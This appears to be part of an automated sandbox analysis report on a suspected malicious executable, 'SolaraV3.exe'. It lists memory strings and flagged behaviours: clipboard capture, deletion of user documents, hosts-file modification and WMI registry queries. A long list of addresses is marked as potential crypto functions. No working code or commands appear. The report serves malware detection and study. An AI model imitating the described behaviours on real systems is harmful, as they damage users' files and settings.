Source: SolaraV3.exe, 00000002.00000002.2037735840.000001FC24A30000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.1.dr	String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: SolaraV3.exe, 00000002.00000003.1708990356.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1772675599.000001FC252A7000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2036193521.000001FC252A2000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038759505.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921057827.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708990356.000001FC25299000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770986223.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921552847.000001FC252A2000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038979504.000001FC252A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B6C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.wykop.pl/
Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: SolaraV3.exe, 00000002.00000003.1769191684.000001FC25569000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043957200.000001FC25C1C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.zhihu.com/
Source: SolaraV3.exe, 00000002.00000003.1772675599.000001FC252A7000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2039868154.000001FC253B7000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2036193521.000001FC252A2000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921057827.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708990356.000001FC25299000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770986223.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921552847.000001FC252A2000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038979504.000001FC252A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733

Creates a window with clipboard capturing capabilities

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Window created: window name: CLIPBRDWNDCLASS

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\SolaraV3.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\LSBIHQFDVT.pdf	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\PALRGUCVEH.mp3	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\ZQIXMVQGAH.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\QNCYCDFIJJ.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\NEBFQQYWPS.docx	Jump to behavior

Modifies the hosts file

Source: C:\Users\user\Desktop\SolaraV3.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Too many similar processes found

Source: conhost.exe	Process created: 40
Source: cmd.exe	Process created: 68

System Summary

Writes or reads registry keys via WMI

Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue

Contains functionality to communicate with device drivers

Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe

Code function: 110_2_00007FF74EE93A70: CreateFileW,CreateFileW,DeviceIoControl,CloseHandle,

110_2_00007FF74EE93A70

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe

Code function: 110_2_00007FF74EEBB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,

110_2_00007FF74EEBB57C

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Detected potential crypto function

Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC701000	1_2_00007FF6DC701000
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC7208C8	1_2_00007FF6DC7208C8
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC7089E0	1_2_00007FF6DC7089E0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC726964	1_2_00007FF6DC726964
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC711D54	1_2_00007FF6DC711D54
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC71E570	1_2_00007FF6DC71E570
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC7135A0	1_2_00007FF6DC7135A0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC71DEF0	1_2_00007FF6DC71DEF0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC729728	1_2_00007FF6DC729728
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC725E7C	1_2_00007FF6DC725E7C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC719EA0	1_2_00007FF6DC719EA0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC709800	1_2_00007FF6DC709800
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC711740	1_2_00007FF6DC711740
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC711F60	1_2_00007FF6DC711F60
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC718794	1_2_00007FF6DC718794
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC7180E4	1_2_00007FF6DC7180E4
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC721874	1_2_00007FF6DC721874
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC7240AC	1_2_00007FF6DC7240AC
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC711944	1_2_00007FF6DC711944
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC712164	1_2_00007FF6DC712164
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC7139A4	1_2_00007FF6DC7139A4
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC70A2DB	1_2_00007FF6DC70A2DB
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC71DA5C	1_2_00007FF6DC71DA5C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC725C00	1_2_00007FF6DC725C00
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC712C10	1_2_00007FF6DC712C10
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC723C10	1_2_00007FF6DC723C10
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC726418	1_2_00007FF6DC726418
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC7208C8	1_2_00007FF6DC7208C8
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC711B50	1_2_00007FF6DC711B50
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC715D30	1_2_00007FF6DC715D30
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC70A47B	1_2_00007FF6DC70A47B
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC70ACAD	1_2_00007FF6DC70ACAD
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC701000	2_2_00007FF6DC701000
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC726964	2_2_00007FF6DC726964
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC70A2DB	2_2_00007FF6DC70A2DB
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC711D54	2_2_00007FF6DC711D54
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC71E570	2_2_00007FF6DC71E570
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC7135A0	2_2_00007FF6DC7135A0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC71DEF0	2_2_00007FF6DC71DEF0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC729728	2_2_00007FF6DC729728
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC725E7C	2_2_00007FF6DC725E7C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC719EA0	2_2_00007FF6DC719EA0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC709800	2_2_00007FF6DC709800
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC711740	2_2_00007FF6DC711740
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC711F60	2_2_00007FF6DC711F60
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC718794	2_2_00007FF6DC718794
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC7208C8	2_2_00007FF6DC7208C8
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC7180E4	2_2_00007FF6DC7180E4
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC721874	2_2_00007FF6DC721874
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC7240AC	2_2_00007FF6DC7240AC
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC7089E0	2_2_00007FF6DC7089E0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC711944	2_2_00007FF6DC711944
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC712164	2_2_00007FF6DC712164
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC7139A4	2_2_00007FF6DC7139A4
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC71DA5C	2_2_00007FF6DC71DA5C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC725C00	2_2_00007FF6DC725C00
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC712C10	2_2_00007FF6DC712C10
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC723C10	2_2_00007FF6DC723C10
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC726418	2_2_00007FF6DC726418
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC7208C8	2_2_00007FF6DC7208C8
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC711B50	2_2_00007FF6DC711B50
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC715D30	2_2_00007FF6DC715D30
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC70A47B	2_2_00007FF6DC70A47B
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC70ACAD	2_2_00007FF6DC70ACAD
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0BB66EE0	2_2_00007FFB0BB66EE0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811EA6	2_2_00007FFB0B811EA6
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815934	2_2_00007FFB0B815934
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814A59	2_2_00007FFB0B814A59
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B813B98	2_2_00007FFB0B813B98
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B812D79	2_2_00007FFB0B812D79
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815D8A	2_2_00007FFB0B815D8A
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81516E	2_2_00007FFB0B81516E
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B948960	2_2_00007FFB0B948960
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B816CBC	2_2_00007FFB0B816CBC
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B816A87	2_2_00007FFB0B816A87
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811F9B	2_2_00007FFB0B811F9B
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B813FDF	2_2_00007FFB0B813FDF
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81655F	2_2_00007FFB0B81655F
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8121BC	2_2_00007FFB0B8121BC
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0BA50E00	2_2_00007FFB0BA50E00
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8160A0	2_2_00007FFB0B8160A0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8122ED	2_2_00007FFB0B8122ED
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811140	2_2_00007FFB0B811140
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B816F28	2_2_00007FFB0B816F28
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81704A	2_2_00007FFB0B81704A
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8C0440	2_2_00007FFB0B8C0440
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B82C480	2_2_00007FFB0B82C480
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8172C5	2_2_00007FFB0B8172C5
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815B14	2_2_00007FFB0B815B14
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B812C7A	2_2_00007FFB0B812C7A
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B9B4170	2_2_00007FFB0B9B4170
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814106	2_2_00007FFB0B814106
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815B78	2_2_00007FFB0B815B78
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B816C21	2_2_00007FFB0B816C21
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814B5B	2_2_00007FFB0B814B5B
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8129D2	2_2_00007FFB0B8129D2
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B82C620	2_2_00007FFB0B82C620
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81177B	2_2_00007FFB0B81177B
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B94C660	2_2_00007FFB0B94C660
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B812144	2_2_00007FFB0B812144
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814638	2_2_00007FFB0B814638
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8125F4	2_2_00007FFB0B8125F4
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8169E7	2_2_00007FFB0B8169E7
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B93DC50	2_2_00007FFB0B93DC50
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B813602	2_2_00007FFB0B813602
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811D02	2_2_00007FFB0B811D02
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B9C99D0	2_2_00007FFB0B9C99D0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B813A8A	2_2_00007FFB0B813A8A
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8159FC	2_2_00007FFB0B8159FC
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814C19	2_2_00007FFB0B814C19
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B812FD1	2_2_00007FFB0B812FD1
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8111CC	2_2_00007FFB0B8111CC
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B812761	2_2_00007FFB0B812761
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8122B1	2_2_00007FFB0B8122B1
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8172AC	2_2_00007FFB0B8172AC
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811622	2_2_00007FFB0B811622
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81736A	2_2_00007FFB0B81736A
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811D88	2_2_00007FFB0B811D88
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B941490	2_2_00007FFB0B941490
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8132EC	2_2_00007FFB0B8132EC
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81228E	2_2_00007FFB0B81228E
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815515	2_2_00007FFB0B815515
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81428C	2_2_00007FFB0B81428C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B82D260	2_2_00007FFB0B82D260
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8130C6	2_2_00007FFB0B8130C6
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815BF5	2_2_00007FFB0B815BF5
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B835200	2_2_00007FFB0B835200
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B949130	2_2_00007FFB0B949130
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B9B50B0	2_2_00007FFB0B9B50B0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B9C9100	2_2_00007FFB0B9C9100
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81710D	2_2_00007FFB0B81710D
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811424	2_2_00007FFB0B811424
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8154D4	2_2_00007FFB0B8154D4
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B951760	2_2_00007FFB0B951760
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814C3C	2_2_00007FFB0B814C3C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B812E91	2_2_00007FFB0B812E91
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814ACA	2_2_00007FFB0B814ACA
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81504C	2_2_00007FFB0B81504C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81276B	2_2_00007FFB0B81276B
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815614	2_2_00007FFB0B815614
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811B27	2_2_00007FFB0B811B27
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8115C8	2_2_00007FFB0B8115C8
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8154CF	2_2_00007FFB0B8154CF
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B952C00	2_2_00007FFB0B952C00
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B813A94	2_2_00007FFB0B813A94
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814D09	2_2_00007FFB0B814D09
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815F10	2_2_00007FFB0B815F10
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8123F6	2_2_00007FFB0B8123F6
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815DA3	2_2_00007FFB0B815DA3
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B9CA900	2_2_00007FFB0B9CA900
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8153AD	2_2_00007FFB0B8153AD
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8144CB	2_2_00007FFB0B8144CB
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B82F060	2_2_00007FFB0B82F060
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81638E	2_2_00007FFB0B81638E
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B9B3010	2_2_00007FFB0B9B3010
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814F43	2_2_00007FFB0B814F43
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B812171	2_2_00007FFB0B812171
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8153C6	2_2_00007FFB0B8153C6
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B82EF00	2_2_00007FFB0B82EF00
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81213A	2_2_00007FFB0B81213A
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8F2CD0	2_2_00007FFB0B8F2CD0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B816564	2_2_00007FFB0B816564
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811299	2_2_00007FFB0B811299
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815434	2_2_00007FFB0B815434
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B813634	2_2_00007FFB0B813634
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B816EBF	2_2_00007FFB0B816EBF
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811A50	2_2_00007FFB0B811A50
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811217	2_2_00007FFB0B811217
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B812301	2_2_00007FFB0B812301
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B816D5C	2_2_00007FFB0B816D5C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8126EE	2_2_00007FFB0B8126EE
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B9C6100	2_2_00007FFB0B9C6100
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814E53	2_2_00007FFB0B814E53
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8168CA	2_2_00007FFB0B8168CA
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B9525D0	2_2_00007FFB0B9525D0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81144C	2_2_00007FFB0B81144C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B93E5F0	2_2_00007FFB0B93E5F0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8165A0	2_2_00007FFB0B8165A0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814408	2_2_00007FFB0B814408
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81318E	2_2_00007FFB0B81318E
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B816FFF	2_2_00007FFB0B816FFF
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8110AA	2_2_00007FFB0B8110AA
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81707C	2_2_00007FFB0B81707C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81416A	2_2_00007FFB0B81416A
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B813698	2_2_00007FFB0B813698
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81348B	2_2_00007FFB0B81348B
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B82BF20	2_2_00007FFB0B82BF20
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8160DC	2_2_00007FFB0B8160DC
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815E25	2_2_00007FFB0B815E25
